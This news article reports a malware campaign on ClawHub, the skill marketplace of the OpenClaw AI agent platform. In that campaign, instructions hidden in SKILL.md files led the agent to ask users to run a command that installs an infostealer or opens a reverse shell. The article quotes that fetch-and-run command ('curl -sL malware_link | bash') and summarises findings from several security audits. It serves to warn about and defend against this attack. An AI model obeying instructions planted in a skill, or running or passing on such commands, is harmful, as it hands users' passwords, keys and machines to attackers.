OpenClaw, a popular open source AI agent platform, is facing a major security crisis. Researchers have found that the most downloaded skill on its official marketplace was actually malware.
For those who do not know, OpenClaw is an open source platform that lets users run AI agents on their systems. These AI agents can perform tasks like browsing the web, managing files, writing code, and running commands. OpenClaw has gained popularity among developers and AI enthusiasts because it allows deep system access and automation.
ClawHub is a public marketplace where third party developers publish “skills” that extend what the AI agent can do. However, this open system has now become a serious security risk.
Security researcher known as @chiefofautism found 1,184 malicious skills listed on ClawHub. Out of these, a single attacker uploaded 677 packages. This shows a large scale supply chain attack.
The issue started because ClawHub allowed anyone to publish a skill using only a one week old GitHub account for verification. Attackers used this weak check to upload fake skills. These skills were disguised as crypto trading bots, YouTube summary tools, and wallet trackers. They had well-written documentation to make it look real.
The real danger was hidden inside files called SKILL.md. These files contained instructions that tricked the AI agent into asking users to run harmful terminal commands. One example was:
curl -sL malware_link | bashIf a user ran this command on macOS, it installed Atomic Stealer, also known as AMOS. This malware can steal browser passwords, SSH keys, Telegram sessions, crypto wallet keys, keychain data, and API keys stored in .env files. On other systems, the malware opened a reverse shell. This gave attackers full remote control of the victim’s computer.
Cisco’s AI Defense team also tested the top-ranked skill on ClawHub, called “What Would Elon Do?”. This skill had reached the number one position. Their scan found nine security issues, including two critical vulnerabilities. The skill secretly sent user data to an attacker-controlled server while hiding its activity.
Earlier audits by Koi Security reviewed 2,857 skills on ClawHub and found 341 malicious entries. That was almost 12 percent of the marketplace. Most of them were linked to a coordinated campaign named ClawHavoc.
Another security company, Snyk, also found 341 malicious skills. One publisher alone uploaded over 314 harmful packages, which were downloaded nearly 7,000 times. All these malicious skills were connected to the same command and control server.
OpenClaw has already partnered with Google’s VirusTotal to scan all uploaded skills. Skills are now marked as safe, suspicious, or malicious. The platform has also started daily re-scanning to detect skills that change after approval.
It is really important to understand the risk of Malicious Skills. OpenClaw agents can access files, run terminal commands, and interact with the system directly. That means a malicious skill can cause much more damage than a simple infected software package. Another concern is that these attacks use natural language instructions instead of traditional malware files. Many security tools are not designed to detect harmful instructions written in plain text.
It is even a bigger risk for enterprises. AI agents can execute commands automatically and may leave limited logs. This creates what experts call a Shadow AI problem, where actions happen without proper monitoring.







